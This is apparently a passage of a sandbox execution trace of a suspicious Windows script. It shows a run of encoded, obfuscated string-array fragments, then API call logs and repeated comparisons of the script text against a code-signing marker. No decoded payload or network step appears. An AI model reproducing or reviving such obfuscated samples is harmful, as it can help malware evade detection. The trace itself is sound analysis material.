==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0073.151] realloc (_Block=0x48dfd0, _Size=0x96d0) returned 0x48dfd0
	[0073.151] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0073.152] free (_Block=0x48dfd0) 
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] CoUninitialize () 
	[0073.152] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.152] CloseHandle (hObject=0x140) returned 1
	[0073.152] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0073.152] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0073.152] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.152] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0073.152] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0073.152] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.152] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.152] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.152] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.152] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.152] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.152] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0073.152] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.152] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.152] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.369] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0073.369] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0073.369] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.369] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0073.369] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0073.369] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0073.369] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0073.369] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.369] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.369] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.369] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0073.369] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0073.369] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0073.369] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.369] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0073.369] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.369] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.369] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0073.369] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0073.369] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.369] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.369] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0073.369] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0073.369] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.369] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0073.369] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.369] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.370] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.370] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.370] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.370] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.370] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.370] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0073.370] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0073.370] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.370] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.370] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.370] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0073.370] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.370] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0073.370] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.370] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.370] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.370] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.370] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0073.370] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.370] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0073.370] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0073.370] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0073.371] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.371] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.371] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.371] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.371] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.371] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.371] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.371] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0073.371] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.371] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0073.371] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.371] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.371] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0073.371] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.371] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.371] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.371] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0073.371] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.371] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0073.371] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0073.371] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.371] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0073.371] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0073.371] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.371] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0073.371] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0073.371] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.371] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.371] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.371] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0073.371] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.371] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.371] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0073.371] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0073.371] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0073.371] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0073.372] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0073.372] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0073.372] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0073.372] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.372] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0073.372] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.372] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.372] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.372] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0073.372] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0073.372] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0073.372] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.372] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0073.372] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.372] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.372] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0073.372] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.372] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0073.372] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0073.372] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0073.372] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.372] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.372] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.372] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
